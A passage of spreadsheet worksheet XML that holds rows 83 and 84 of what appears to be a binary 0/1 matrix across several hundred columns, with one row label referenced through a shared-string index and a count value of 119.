        <v>0</v>
      </c>
      <c r="FP83">
        <v>0</v>
      </c>
      <c r="FQ83">
        <v>0</v>
      </c>
      <c r="FR83">
        <v>0</v>
      </c>
      <c r="FS83">
        <v>0</v>
      </c>
      <c r="FT83">
        <v>0</v>
      </c>
      <c r="FU83">
        <v>0</v>
      </c>
      <c r="FV83">
        <v>0</v>
      </c>
      <c r="FW83">
        <v>0</v>
      </c>
      <c r="FX83">
        <v>0</v>
      </c>
      <c r="FY83">
        <v>0</v>
      </c>
      <c r="FZ83">
        <v>0</v>
      </c>
      <c r="GA83">
        <v>0</v>
      </c>
      <c r="GB83">
        <v>0</v>
      </c>
      <c r="GC83">
        <v>0</v>
      </c>
      <c r="GD83">
        <v>0</v>
      </c>
      <c r="GE83">
        <v>0</v>
      </c>
      <c r="GF83">
        <v>1</v>
      </c>
      <c r="GG83">
        <v>0</v>
      </c>
      <c r="GH83">
        <v>0</v>
      </c>
      <c r="GI83">
        <v>0</v>
      </c>
      <c r="GJ83">
        <v>0</v>
      </c>
      <c r="GK83">
        <v>0</v>
      </c>
      <c r="GL83">
        <v>0</v>
      </c>
      <c r="GM83">
        <v>0</v>
      </c>
      <c r="GN83">
        <v>0</v>
      </c>
      <c r="GO83">
        <v>0</v>
      </c>
      <c r="GP83">
        <v>0</v>
      </c>
      <c r="GQ83">
        <v>0</v>
      </c>
      <c r="GR83">
        <v>0</v>
      </c>
      <c r="GS83">
        <v>0</v>
      </c>
      <c r="GT83">
        <v>0</v>
      </c>
      <c r="GU83">
        <v>0</v>
      </c>
      <c r="GV83">
        <v>0</v>
      </c>
      <c r="GW83">
        <v>0</v>
      </c>
      <c r="GX83">
        <v>0</v>
      </c>
      <c r="GY83">
        <v>0</v>
      </c>
      <c r="GZ83">
        <v>0</v>
      </c>
      <c r="HA83">
        <v>0</v>
      </c>
      <c r="HB83">
        <v>0</v>
      </c>
      <c r="HC83">
        <v>0</v>
      </c>
      <c r="HD83">
        <v>0</v>
      </c>
      <c r="HE83">
        <v>0</v>
      </c>
      <c r="HF83">
        <v>0</v>
      </c>
      <c r="HG83">
        <v>0</v>
      </c>
      <c r="HH83">
        <v>0</v>
      </c>
      <c r="HI83">
        <v>0</v>
      </c>
      <c r="HJ83">
        <v>0</v>
      </c>
      <c r="HK83">
        <v>0</v>
      </c>
      <c r="HL83">
        <v>0</v>
      </c>
      <c r="HM83">
        <v>0</v>
      </c>
      <c r="HN83">
        <v>0</v>
      </c>
      <c r="HO83">
        <v>0</v>
      </c>
      <c r="HP83">
        <v>0</v>
      </c>
      <c r="HQ83">
        <v>0</v>
      </c>
      <c r="HR83">
        <v>0</v>
      </c>
      <c r="HS83">
        <v>0</v>
      </c>
      <c r="HT83">
        <v>0</v>
      </c>
      <c r="HU83">
        <v>0</v>
      </c>
      <c r="HV83">
        <v>1</v>
      </c>
      <c r="HW83">
        <v>0</v>
      </c>
      <c r="HX83">
        <v>0</v>
      </c>
      <c r="HY83">
        <v>0</v>
      </c>
      <c r="HZ83">
        <v>0</v>
      </c>
      <c r="IA83">
        <v>0</v>
      </c>
      <c r="IB83">
        <v>0</v>
      </c>
      <c r="IC83">
        <v>0</v>
      </c>
      <c r="ID83">
        <v>0</v>
      </c>
      <c r="IE83">
        <v>0</v>
      </c>
      <c r="IF83">
        <v>0</v>
      </c>
      <c r="IG83">
        <v>0</v>
      </c>
      <c r="IH83">
        <v>0</v>
      </c>
      <c r="II83">
        <v>0</v>
      </c>
      <c r="IJ83">
        <v>0</v>
      </c>
      <c r="IK83">
        <v>0</v>
      </c>
      <c r="IL83">
        <v>0</v>
      </c>
      <c r="IM83">
        <v>0</v>
      </c>
      <c r="IN83">
        <v>0</v>
      </c>
      <c r="IO83">
        <v>0</v>
      </c>
      <c r="IP83">
        <v>0</v>
      </c>
      <c r="IQ83">
        <v>0</v>
      </c>
      <c r="IR83">
        <v>0</v>
      </c>
      <c r="IS83">
        <v>0</v>
      </c>
      <c r="IT83">
        <v>0</v>
      </c>
      <c r="IU83">
        <v>0</v>
      </c>
      <c r="IV83">
        <v>0</v>
      </c>
      <c r="IW83">
        <v>0</v>
      </c>
      <c r="IX83">
        <v>0</v>
      </c>
      <c r="IY83">
        <v>0</v>
      </c>
      <c r="IZ83">
        <v>0</v>
      </c>
      <c r="JA83">
        <v>0</v>
      </c>
      <c r="JB83">
        <v>0</v>
      </c>
      <c r="JC83">
        <v>0</v>
      </c>
      <c r="JD83">
        <v>0</v>
      </c>
      <c r="JE83">
        <v>0</v>
      </c>
      <c r="JF83">
        <v>0</v>
      </c>
      <c r="JG83">
        <v>0</v>
      </c>
      <c r="JH83">
        <v>0</v>
      </c>
      <c r="JI83">
        <v>0</v>
      </c>
      <c r="JJ83">
        <v>0</v>
      </c>
      <c r="JK83">
        <v>0</v>
      </c>
      <c r="JL83">
        <v>0</v>
      </c>
      <c r="JM83">
        <v>0</v>
      </c>
      <c r="JN83">
        <v>0</v>
      </c>
      <c r="JO83">
        <v>0</v>
      </c>
      <c r="JP83">
        <v>0</v>
      </c>
      <c r="JQ83">
        <v>0</v>
      </c>
      <c r="JR83">
        <v>0</v>
      </c>
      <c r="JS83">
        <v>0</v>
      </c>
      <c r="JT83">
        <v>0</v>
      </c>
      <c r="JU83">
        <v>0</v>
      </c>
      <c r="JV83">
        <v>0</v>
      </c>
      <c r="JW83">
        <v>0</v>
      </c>
      <c r="JX83">
        <v>0</v>
      </c>
      <c r="JY83">
        <v>0</v>
      </c>
      <c r="JZ83">
        <v>0</v>
      </c>
      <c r="KA83">
        <v>0</v>
      </c>
      <c r="KB83">
        <v>0</v>
      </c>
      <c r="KC83">
        <v>0</v>
      </c>
      <c r="KD83">
        <v>0</v>
      </c>
      <c r="KE83">
        <v>0</v>
      </c>
      <c r="KF83">
        <v>0</v>
      </c>
      <c r="KG83">
        <v>0</v>
      </c>
      <c r="KH83">
        <v>0</v>
      </c>
      <c r="KI83">
        <v>0</v>
      </c>
      <c r="KJ83">
        <v>0</v>
      </c>
      <c r="KK83">
        <v>0</v>
      </c>
      <c r="KL83">
        <v>0</v>
      </c>
      <c r="KM83">
        <v>0</v>
      </c>
      <c r="KN83">
        <v>0</v>
      </c>
      <c r="KO83">
        <v>0</v>
      </c>
      <c r="KP83">
        <v>0</v>
      </c>
      <c r="KQ83">
        <v>0</v>
      </c>
      <c r="KR83">
        <v>0</v>
      </c>
      <c r="KS83">
        <v>0</v>
      </c>
      <c r="KT83">
        <v>0</v>
      </c>
      <c r="KU83">
        <v>0</v>
      </c>
      <c r="KV83">
        <v>0</v>
      </c>
      <c r="KW83">
        <v>0</v>
      </c>
      <c r="KX83">
        <v>0</v>
      </c>
      <c r="KY83">
        <v>0</v>
      </c>
      <c r="KZ83">
        <v>0</v>
      </c>
      <c r="LA83">
        <v>0</v>
      </c>
      <c r="LB83">
        <v>0</v>
      </c>
      <c r="LC83">
        <v>0</v>
      </c>
      <c r="LD83">
        <v>1</v>
      </c>
      <c r="LE83">
        <v>0</v>
      </c>
      <c r="LF83">
        <v>0</v>
      </c>
      <c r="LG83">
        <v>0</v>
      </c>
      <c r="LH83">
        <v>0</v>
      </c>
      <c r="LI83">
        <v>0</v>
      </c>
      <c r="LJ83">
        <v>0</v>
      </c>
      <c r="LK83">
        <v>0</v>
      </c>
      <c r="LL83">
        <v>0</v>
      </c>
      <c r="LM83">
        <v>0</v>
      </c>
      <c r="LN83">
        <v>0</v>
      </c>
      <c r="LO83">
        <v>0</v>
      </c>
      <c r="LP83">
        <v>0</v>
      </c>
      <c r="LQ83">
        <v>0</v>
      </c>
      <c r="LR83">
        <v>0</v>
      </c>
      <c r="LS83">
        <v>0</v>
      </c>
      <c r="LT83">
        <v>0</v>
      </c>
      <c r="LU83">
        <v>0</v>
      </c>
      <c r="LV83">
        <v>0</v>
      </c>
      <c r="LW83">
        <v>0</v>
      </c>
      <c r="LX83">
        <v>0</v>
      </c>
      <c r="LY83">
        <v>0</v>
      </c>
      <c r="LZ83">
        <v>1</v>
      </c>
      <c r="MA83">
        <v>0</v>
      </c>
      <c r="MB83">
        <v>0</v>
      </c>
      <c r="MC83">
        <v>0</v>
      </c>
      <c r="MD83">
        <v>0</v>
      </c>
      <c r="ME83">
        <v>0</v>
      </c>
      <c r="MF83">
        <v>0</v>
      </c>
      <c r="MG83">
        <v>0</v>
      </c>
      <c r="MH83">
        <v>0</v>
      </c>
      <c r="MI83">
        <v>0</v>
      </c>
      <c r="MJ83">
        <v>0</v>
      </c>
      <c r="MK83">
        <v>0</v>
      </c>
      <c r="ML83">
        <v>1</v>
      </c>
      <c r="MM83">
        <v>0</v>
      </c>
      <c r="MN83">
        <v>0</v>
      </c>
      <c r="MO83">
        <v>0</v>
      </c>
      <c r="MP83">
        <v>0</v>
      </c>
      <c r="MQ83">
        <v>0</v>
      </c>
      <c r="MR83">
        <v>0</v>
      </c>
      <c r="MS83">
        <v>1</v>
      </c>
      <c r="MT83">
        <v>0</v>
      </c>
      <c r="MU83">
        <v>0</v>
      </c>
      <c r="MV83">
        <v>0</v>
      </c>
      <c r="MW83">
        <v>0</v>
      </c>
      <c r="MX83">
        <v>0</v>
      </c>
      <c r="MY83">
        <v>0</v>
      </c>
      <c r="MZ83">
        <v>0</v>
      </c>
      <c r="NA83">
        <v>0</v>
      </c>
      <c r="NB83">
        <v>0</v>
      </c>
      <c r="NC83">
        <v>0</v>
      </c>
      <c r="ND83">
        <v>0</v>
      </c>
      <c r="NE83">
        <v>0</v>
      </c>
      <c r="NF83">
        <v>0</v>
      </c>
      <c r="NG83">
        <v>0</v>
      </c>
      <c r="NH83">
        <v>0</v>
      </c>
      <c r="NI83">
        <v>0</v>
      </c>
      <c r="NJ83">
        <v>0</v>
      </c>
      <c r="NK83">
        <v>0</v>
      </c>
      <c r="NL83">
        <v>0</v>
      </c>
      <c r="NM83">
        <v>0</v>
      </c>
      <c r="NN83">
        <v>0</v>
      </c>
      <c r="NO83">
        <v>0</v>
      </c>
      <c r="NP83">
        <v>0</v>
      </c>
      <c r="NQ83">
        <v>0</v>
      </c>
      <c r="NR83">
        <v>0</v>
      </c>
      <c r="NS83">
        <v>0</v>
      </c>
      <c r="NT83">
        <v>0</v>
      </c>
      <c r="NU83">
        <v>0</v>
      </c>
      <c r="NV83">
        <v>0</v>
      </c>
      <c r="NW83">
        <v>0</v>
      </c>
      <c r="NX83">
        <v>0</v>
      </c>
      <c r="NY83">
        <v>0</v>
      </c>
      <c r="NZ83">
        <v>0</v>
      </c>
      <c r="OA83">
        <v>0</v>
      </c>
      <c r="OB83">
        <v>0</v>
      </c>
      <c r="OC83">
        <v>0</v>
      </c>
      <c r="OD83">
        <v>0</v>
      </c>
      <c r="OE83">
        <v>0</v>
      </c>
      <c r="OF83">
        <v>0</v>
      </c>
      <c r="OG83">
        <v>0</v>
      </c>
      <c r="OH83">
        <v>0</v>
      </c>
      <c r="OI83">
        <v>0</v>
      </c>
      <c r="OJ83">
        <v>0</v>
      </c>
      <c r="OK83">
        <v>0</v>
      </c>
      <c r="OL83">
        <v>0</v>
      </c>
      <c r="OM83">
        <v>0</v>
      </c>
      <c r="ON83">
        <v>0</v>
      </c>
      <c r="OO83">
        <v>0</v>
      </c>
      <c r="OP83">
        <v>0</v>
      </c>
      <c r="OQ83">
        <v>0</v>
      </c>
      <c r="OR83">
        <v>0</v>
      </c>
      <c r="OS83">
        <v>0</v>
      </c>
      <c r="OT83">
        <v>0</v>
      </c>
      <c r="OU83">
        <v>0</v>
      </c>
      <c r="OV83">
        <v>0</v>
      </c>
      <c r="OW83">
        <v>0</v>
      </c>
      <c r="OX83">
        <v>0</v>
      </c>
      <c r="OY83">
        <v>0</v>
      </c>
      <c r="OZ83">
        <v>0</v>
      </c>
      <c r="PA83">
        <v>1</v>
      </c>
      <c r="PB83">
        <v>0</v>
      </c>
      <c r="PC83">
        <v>0</v>
      </c>
      <c r="PD83">
        <v>0</v>
      </c>
      <c r="PE83">
        <v>0</v>
      </c>
      <c r="PF83">
        <v>0</v>
      </c>
      <c r="PG83">
        <v>0</v>
      </c>
      <c r="PH83">
        <v>0</v>
      </c>
      <c r="PI83">
        <v>0</v>
      </c>
      <c r="PJ83">
        <v>0</v>
      </c>
      <c r="PK83">
        <v>0</v>
      </c>
      <c r="PL83">
        <v>0</v>
      </c>
      <c r="PM83">
        <v>1</v>
      </c>
      <c r="PN83">
        <v>0</v>
      </c>
      <c r="PO83">
        <v>0</v>
      </c>
      <c r="PP83">
        <v>0</v>
      </c>
      <c r="PQ83">
        <v>0</v>
      </c>
      <c r="PR83">
        <v>0</v>
      </c>
      <c r="PS83">
        <v>0</v>
      </c>
      <c r="PT83">
        <v>0</v>
      </c>
      <c r="PU83">
        <v>0</v>
      </c>
      <c r="PV83">
        <v>0</v>
      </c>
      <c r="PW83">
        <v>0</v>
      </c>
      <c r="PX83">
        <v>0</v>
      </c>
      <c r="PY83">
        <v>0</v>
      </c>
      <c r="PZ83">
        <v>0</v>
      </c>
      <c r="QA83">
        <v>0</v>
      </c>
      <c r="QB83">
        <v>0</v>
      </c>
      <c r="QC83">
        <v>0</v>
      </c>
      <c r="QD83">
        <v>0</v>
      </c>
      <c r="QE83">
        <v>0</v>
      </c>
      <c r="QF83">
        <v>0</v>
      </c>
      <c r="QG83">
        <v>0</v>
      </c>
      <c r="QH83">
        <v>0</v>
      </c>
      <c r="QI83">
        <v>0</v>
      </c>
      <c r="QJ83">
        <v>0</v>
      </c>
      <c r="QK83">
        <v>0</v>
      </c>
      <c r="QL83">
        <v>0</v>
      </c>
      <c r="QM83">
        <v>0</v>
      </c>
      <c r="QN83">
        <v>0</v>
      </c>
      <c r="QO83">
        <v>0</v>
      </c>
      <c r="QP83">
        <v>0</v>
      </c>
      <c r="QQ83">
        <v>0</v>
      </c>
      <c r="QR83">
        <v>0</v>
      </c>
      <c r="QS83">
        <v>0</v>
      </c>
      <c r="QT83">
        <v>0</v>
      </c>
      <c r="QU83">
        <v>0</v>
      </c>
      <c r="QV83">
        <v>0</v>
      </c>
      <c r="QW83">
        <v>0</v>
      </c>
      <c r="QX83">
        <v>0</v>
      </c>
      <c r="QY83">
        <v>0</v>
      </c>
      <c r="QZ83">
        <v>0</v>
      </c>
      <c r="RA83">
        <v>0</v>
      </c>
      <c r="RB83">
        <v>0</v>
      </c>
      <c r="RC83">
        <v>0</v>
      </c>
      <c r="RD83">
        <v>0</v>
      </c>
      <c r="RE83">
        <v>0</v>
      </c>
      <c r="RF83">
        <v>0</v>
      </c>
      <c r="RG83">
        <v>0</v>
      </c>
      <c r="RH83">
        <v>0</v>
      </c>
      <c r="RI83">
        <v>0</v>
      </c>
      <c r="RJ83">
        <v>0</v>
      </c>
      <c r="RK83">
        <v>0</v>
      </c>
      <c r="RL83">
        <v>0</v>
      </c>
      <c r="RM83">
        <v>0</v>
      </c>
      <c r="RN83">
        <v>0</v>
      </c>
      <c r="RO83">
        <v>0</v>
      </c>
      <c r="RP83">
        <v>0</v>
      </c>
      <c r="RQ83">
        <v>0</v>
      </c>
      <c r="RR83">
        <v>0</v>
      </c>
      <c r="RS83">
        <v>0</v>
      </c>
      <c r="RT83">
        <v>0</v>
      </c>
      <c r="RU83">
        <v>0</v>
      </c>
      <c r="RV83">
        <v>0</v>
      </c>
      <c r="RW83">
        <v>0</v>
      </c>
      <c r="RX83">
        <v>0</v>
      </c>
      <c r="RY83">
        <v>0</v>
      </c>
      <c r="RZ83">
        <v>0</v>
      </c>
      <c r="SA83">
        <v>0</v>
      </c>
    </row>
    <row r="84" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A84" s="6" t="s">
        <v>3339</v>
      </c>
      <c r="B84">
        <v>119</v>
      </c>
      <c r="C84">
        <v>0</v>
      </c>
      <c r="D84">
        <v>0</v>
      </c>
      <c r="E84">
        <v>1</v>
      </c>
      <c r="F84">
        <v>0</v>
      </c>
      <c r="G84">
        <v>0</v>
      </c>
      <c r="H84">
        <v>0</v>
      </c>
      <c r="I84">
        <v>1</v>
      </c>
      <c r="J84">
        <v>0</v>
      </c>
      <c r="K84">
        <v>0</v>
      </c>
      <c r="L84">
        <v>1</v>
      </c>
      <c r="M84">
        <v>1</v>
      </c>
      <c r="N84">
        <v>0</v>
      </c>
      <c r="O84">
        <v>1</v>
      </c>
      <c r="P84">
        <v>0</v>
      </c>
      <c r="Q84">
        <v>1</v>
      </c>
      <c r="R84">
        <v>0</v>
      </c>
      <c r="S84">
        <v>1</v>
      </c>
      <c r="T84">
        <v>1</v>
      </c>
      <c r="U84">
        <v>0</v>
      </c>
      <c r="V84">
        <v>0</v>
      </c>
      <c r="W84">
        <v>0</v>
      </c>
      <c r="X84">
        <v>1</v>
      </c>
      <c r="Y84">
        <v>1</v>
      </c>
      <c r="Z84">
        <v>0</v>
      </c>
      <c r="AA84">
        <v>0</v>
      </c>
      <c r="AB84">
        <v>0</v>
      </c>
      <c r="AC84">
        <v>1</v>
      </c>
      <c r="AD84">
        <v>0</v>
      </c>
      <c r="AE84">
        <v>1</v>
      </c>
      <c r="AF84">
        <v>0</v>
      </c>
      <c r="AG84">
        <v>0</v>
      </c>
      <c r="AH84">
        <v>0</v>
      </c>
      <c r="AI84">
        <v>1</v>
      </c>
      <c r="AJ84">
        <v>1</v>
      </c>
      <c r="AK84">
        <v>0</v>
      </c>
      <c r="AL84">
        <v>0</v>
      </c>
      <c r="AM84">
        <v>0</v>
      </c>
      <c r="AN84">
        <v>1</v>
      </c>
      <c r="AO84">
        <v>1</v>
      </c>
      <c r="AP84">
        <v>1</v>
      </c>
      <c r="AQ84">
        <v>1</v>
      </c>
      <c r="AR84">
        <v>0</v>
      </c>
      <c r="AS84">
        <v>0</v>
      </c>
      <c r="AT84">
        <v>0</v>
      </c>
      <c r="AU84">
        <v>0</v>
      </c>
      <c r="AV84">
        <v>0</v>
      </c>
      <c r="AW84">
        <v>0</v>
      </c>
      <c r="AX84">
        <v>0</v>
      </c>
      <c r="AY84">
        <v>1</v>
      </c>
      <c r="AZ84">
        <v>0</v>
      </c>
      <c r="BA84">
        <v>0</v>
      </c>
      <c r="BB84">
        <v>0</v>
      </c>
      <c r="BC84">
        <v>0</v>
      </c>
      <c r="BD84">
        <v>0</v>
      </c>
      <c r="BE84">
        <v>0</v>
      </c>
      <c r="BF84">
        <v>0</v>
      </c>
      <c r="BG84">
        <v>0</v>
      </c>
      <c r="BH84">
        <v>0</v>
      </c>
      <c r="BI84">
        <v>0</v>
      </c>
      <c r="BJ84">
        <v>0</v>
      </c>
      <c r="BK84">
        <v>0</v>
      </c>
      <c r="BL84">
        <v>0</v>
      </c>
      <c r="BM84">
        <v>0</v>
      </c>
      <c r="BN84">
        <v>0</v>
      </c>
      <c r="BO84">
        <v>1</v>
      </c>
      <c r="BP84">
        <v>1</v>
      </c>
      <c r="BQ84">
        <v>0</v>
      </c>
      <c r="BR84">
        <v>0</v>
      </c>
      <c r="BS84">
        <v>0</v>
      </c>
      <c r="BT84">
        <v>0</v>
      </c>
      <c r="BU84">
        <v>0</v>
      </c>
      <c r="BV84">
        <v>0</v>
      </c>
      <c r="BW84">
        <v>0</v>
      </c>
      <c r="BX84">
        <v>1</v>
      </c>
      <c r="BY84">
        <v>0</v>
      </c>
      <c r="BZ84">
        <v>1</v>
      </c>
      <c r="CA84">
        <v>1</v>
      </c>
      <c r="CB84">
        <v>0</v>
      </c>
      <c r="CC84">
        <v>0</v>
      </c>
      <c r="CD84">
        <v>1</v>
      </c>
      <c r="CE84">
        <v>1</v>
      </c>
      <c r="CF84">
        <v>0</v>
      </c>
      <c r="CG84">
        <v>0</v>
      </c>
      <c r="CH84">
        <v>0</v>
      </c>
      <c r="CI84">
        <v>0</v>
      </c>
      <c r="CJ84">
        <v>0</v>
      </c>
      <c r="CK84">
        <v>0</v>
      </c>
      <c r="CL84">
        <v>0</v>
      </c>
      <c r="CM84">
        <v>1</v>
      </c>
      <c r="CN84">
        <v>0</v>
      </c>
      <c r="CO84">
        <v>0</v>
      </c>
      <c r="CP84">
        <v>0</v>
      </c>
      <c r="CQ84">
        <v>0</v>
      </c>
      <c r="CR84">
        <v>0</v>
      </c>
      <c r="CS84">
        <v>1</v>
      </c>
      <c r="CT84">
        <v>0</v>
      </c>
      <c r="CU84">
        <v>0</v>
      </c>
      <c r="CV84">
        <v>0</v>
      </c>
      <c r="CW84">
        <v>0</v>
      </c>
      <c r="CX84">
        <v>0</v>
      </c>
      <c r="CY84">
        <v>0</v>
      </c>
      <c r="CZ84">
        <v>0</v>
      </c>
      <c r="DA84">
        <v>1</v>
      </c>
      <c r="DB84">
        <v>1</v>
      </c>
      <c r="DC84">
        <v>1</v>
      </c>
      <c r="DD84">
        <v>0</v>
      </c>
      <c r="DE84">
        <v>0</v>
      </c>
      <c r="DF84">
        <v>1</v>
      </c>
      <c r="DG84">
        <v>0</v>
      </c>
      <c r="DH84">
        <v>0</v>
      </c>
      <c r="DI84">
        <v>0</v>
      </c>
      <c r="DJ84">
        <v>1</v>
      </c>
      <c r="DK84">
        <v>1</v>
      </c>
      <c r="DL84">
        <v>0</v>
      </c>
      <c r="DM84">
        <v>0</v>
      </c>
      <c r="DN84">
        <v>0</v>
      </c>
      <c r="DO84">
        <v>0</v>
      </c>
      <c r="DP84">
        <v>0</v>
      </c>
      <c r="DQ84">
        <v>0</v>
      </c>
      <c r="DR84">
        <v>0</v>
      </c>
      <c r="DS84">
        <v>1</v>
      </c>
      <c r="DT84">
        <v>0</v>
      </c>
      <c r="DU84">
        <v>1</v>
      </c>
      <c r="DV84">
        <v>0</v>
      </c>
      <c r="DW84">
        <v>0</v>
      </c>
      <c r="DX84">
        <v>0</v>
      </c>
      <c r="DY84">
        <v>0</v>
      </c>
      <c r="DZ84">
        <v>0</v>
      </c>
      <c r="EA84">
        <v>0</v>
      </c>
      <c r="EB84">
        <v>0</v>
      </c>
      <c r="EC84">
        <v>1</v>
      </c>
      <c r="ED84">
        <v>0</v>
      </c>
      <c r="EE84">
        <v>0</v>
      </c>
      <c r="EF84">
        <v>1</v>
      </c>
      <c r="EG84">
        <v>1</v>
      </c>
      <c r="EH84">
        <v>0</v>
      </c>
      <c r="EI84">
        <v>0</v>
      </c>
      <c r="EJ84">
        <v>0</v>
      </c>
      <c r="EK84">
        <v>0</v>
      </c>
      <c r="EL84">
        <v>0</v>
      </c>
      <c r="EM84">
        <v>0</v>
      </c>
      <c r="EN84">
        <v>0</v>
      </c>
      <c r="EO84">
        <v>0</v>
      </c>
      <c r="EP84">
        <v>0</v>
      </c>
      <c r="EQ84">
        <v>0</v>
      </c>
      <c r="ER84">
        <v>0</v>
      </c>
      <c r="ES84">
        <v>0</v>
      </c>
      <c r="ET84">
        <v>0</v>
      </c>
      <c r="EU84">
        <v>0</v>
      </c>
      <c r="EV84">
        <v>1</v>
      </c>
      <c r="EW84">
        <v>0</v>
      </c>
      <c r="EX84">
        <v>1</v>
      </c>
      <c r="EY84">
        <v>1</v>
      </c>
      <c r="EZ84">
        <v>0</v>
      </c>
      <c r="FA84">
        <v>0</v>
      </c>
      <c r="FB84">
        <v>0</v>
      </c>
      <c r="FC84">
        <v>0</v>
      </c>
      <c r="FD84">
        <v>0</v>
      </c>
      <c r="FE84">
        <v>0</v>
      </c>
      <c r="FF84">
        <v>0</v>
      </c>
      <c r="FG84">
        <v>0</v>
      </c>
      <c r="FH84">
        <v>0</v>
      </c>
      <c r="FI84">
        <v>0</v>
      </c>
      <c r="FJ84">
        <v>0</v>
      </c>
      <c r="FK84">
        <v>0</v>
      </c>
      <c r="FL84">
        <v>0</v>
      </c>
      <c r="FM84">
        <v>0</v>
      </c>
      <c r="FN84">
        <v>0</v>
      </c>
      <c r="FO84">
        <v>0</v>
      </c>
      <c r="FP84">
        <v>1</v>
      </c>
      <c r="FQ84">
        <v>0</v>
      </c>
      <c r="FR84">
        <v>0</v>
      </c>
      <c r="FS84">
        <v>0</v>
      </c>
      <c r="FT84">
        <v>1</v>
      </c>
      <c r="FU84">
        <v>0</v>
      </c>
      <c r="FV84">
        <v>1</v>
      </c>
      <c r="FW84">
        <v>0</v>
      </c>
      <c r="FX84">
        <v>0</v>
      </c>
      <c r="FY84">
        <v>0</v>
      </c>
      <c r="FZ84">
        <v>0</v>
      </c>
      <c r="GA84">
        <v>1</v>
      </c>
      <c r="GB84">
        <v>0</v>
      </c>
      <c r="GC84">
        <v>1</v>
      </c>
      <c r="GD84">
        <v>0</v>
      </c>
      <c r="GE84">
        <v>0</v>
      </c>
      <c r="GF84">
        <v>1</v>
      </c>
      <c r="GG84">
        <v>0</v>
      </c>
      <c r="GH84">
        <v>1</v>
      </c>
      <c r="GI84">
        <v>0</v>
      </c>
      <c r="GJ84">
        <v>0</v>
      </c>
      <c r="GK84">
        <v>0</v>
      </c>
      <c r="GL84">
        <v>0</v>
      </c>
      <c r="GM84">
        <v>0</v>
      </c>
      <c r="GN84">
        <v>0</v>
      </c>
      <c r="GO84">
        <v>0</v>
      </c>
      <c r="GP84">
        <v>0</v>
      </c>
      <c r="GQ84">
        <v>1</v>
      </c>
      <c r="GR84">
        <v>0</v>
      </c>
      <c r="GS84">
        <v>1</v>
      </c>
      <c r="GT84">
        <v>0</v>
      </c>
      <c r="GU84">
        <v>0</v>
      </c>
      <c r="GV84">
        <v>0</v>
      </c>
      <c r="GW84">
        <v>1</v>
      </c>
      <c r="GX84">
        <v>0</v>
      </c>
      <c r="GY84">
        <v>0</v>
      </c>
      <c r="GZ84">
        <v>0</v>
      </c>
      <c r="HA84">
        <v>0</v>
      </c>
      <c r="HB84">
        <v>0</v>
      </c>
      <c r="HC84">
        <v>0</v>
      </c>
      <c r="HD84">
        <v>1</v>
      </c>
      <c r="HE84">
        <v>0</v>
      </c>
      <c r="HF84">
        <v>0</v>
      </c>
      <c r="HG84">
        <v>1</v>
      </c>
      <c r="HH84">
        <v>0</v>
      </c>
      <c r="HI84">
        <v>0</v>
      </c>
      <c r="HJ84">
        <v>0</v>
      </c>
      <c r="HK84">
        <v>0</v>
      </c>
      <c r="HL84">
        <v>0</v>
      </c>
      <c r="HM84">
        <v>1</v>
      </c>
      <c r="HN84">
        <v>0</v>
      </c>
      <c r="HO84">
        <v>0</v>
      </c>
      <c r="HP84">
        <v>1</v>
      </c>
      <c r="HQ84">
        <v>0</v>
      </c>
      <c r="HR84">
        <v>0</v>
      </c>
      <c r="HS84">
        <v>1</v>
      </c>
      <c r="HT84">
        <v>0</v>
      </c>
      <c r="HU84">
        <v>0</v>
      </c>
      <c r="HV84">
        <v>1</v>
      </c>
      <c r="HW84">
        <v>0</v>
      </c>
      <c r="HX84">
        <v>0</v>
      </c>
      <c r="HY84">
        <v>0</v>
      </c>
      <c r="HZ84">
        <v>0</v>
      </c>
      <c r="IA84">
        <v>1</v>
      </c>
      <c r="IB84">
        <v>0</v>
      </c>
      <c r="IC84">
        <v>1</v>
      </c>
      <c r="ID84">
        <v>0</v>
      </c>
      <c r="IE84">
        <v>0</v>
      </c>
      <c r="IF84">
        <v>0</v>
      </c>
      <c r="IG84">
        <v>0</v>
      </c>
      <c r="IH84">
        <v>0</v>
      </c>
      <c r="II84">
        <v>1</v>
      </c>
      <c r="IJ84">
        <v>0</v>
      </c>
      <c r="IK84">
        <v>0</v>
      </c>
      <c r="IL84">
        <v>0</v>
      </c>
      <c r="IM84">
        <v>0</v>
      </c>
      <c r="IN84">
        <v>0</v>
      </c>
      <c r="IO84">
        <v>0</v>
      </c>
      <c r="IP84">
        <v>1</v>
      </c>
      <c r="IQ84">
        <v>0</v>
      </c>
      <c r="IR84">
        <v>0</v>
      </c>
      <c r="IS84">
        <v>0</v>
      </c>
      <c r="IT84">
        <v>0</v>
      </c>
      <c r="IU84">
        <v>0</v>
      </c>
      <c r="IV84">
        <v>1</v>
      </c>
      <c r="IW84">
        <v>0</v>
      </c>
      <c r="IX84">
        <v>0</v>
      </c>
      <c r="IY84">
        <v>0</v>
      </c>
      <c r="IZ84">
        <v>0</v>
      </c>
      <c r="JA84">
        <v>0</v>
      </c>
      <c r="JB84">
        <v>0</v>
      </c>
      <c r="JC84">
        <v>0</v>
      </c>
      <c r="JD84">
        <v>0</v>
      </c>
      <c r="JE84">
        <v>1</v>
      </c>
      <c r="JF84">
        <v>0</v>
      </c>
      <c r="JG84">
        <v>0</v>
      </c>
      <c r="JH84">
        <v>0</v>
      </c>
      <c r="JI84">
        <v>0</v>
      </c>
      <c r="JJ84">
        <v>0</v>
      </c>
      <c r="JK84">
        <v>0</v>
      </c>
      <c r="JL84">
        <v>1</v>
      </c>
      <c r="JM84">
        <v>0</v>
      </c>
      <c r="JN84">
        <v>0</v>
      </c>
      <c r="JO84">
        <v>0</v>
      </c>
      <c r="JP84">
        <v>1</v>
      </c>
      <c r="JQ84">
        <v>0</v>
      </c>
      <c r="JR84">
        <v>1</v>
      </c>
      <c r="JS84">
        <v>1</v>
      </c>
      <c r="JT84">
        <v>0</v>
      </c>
      <c r="JU84">
        <v>0</v>
      </c>
      <c r="JV84">
        <v>0</v>
      </c>
      <c r="JW84">
        <v>1</v>
      </c>
      <c r="JX84">
        <v>0</v>
      </c>
      <c r="JY84">
        <v>0</v>
      </c>
      <c r="JZ84">
        <v>0</v>
      </c>
      <c r="KA84">
        <v>0</v>
      </c>
      <c r="KB84">
        <v>0</v>
      </c>
      <c r="KC84">
        <v>0</v>
      </c>
      <c r="KD84">
        <v>0</v>
      </c>
      <c r="KE84">
        <v>1</v>
      </c>
      <c r="KF84">
        <v>0</v>
      </c>
      <c r="KG84">
        <v>0</v>
      </c>
      <c r="KH84">
        <v>1</v>
      </c>
      <c r="KI84">
        <v>0</v>
      </c>
      <c r="KJ84">
        <v>0</v>
      </c>
      <c r="KK84">
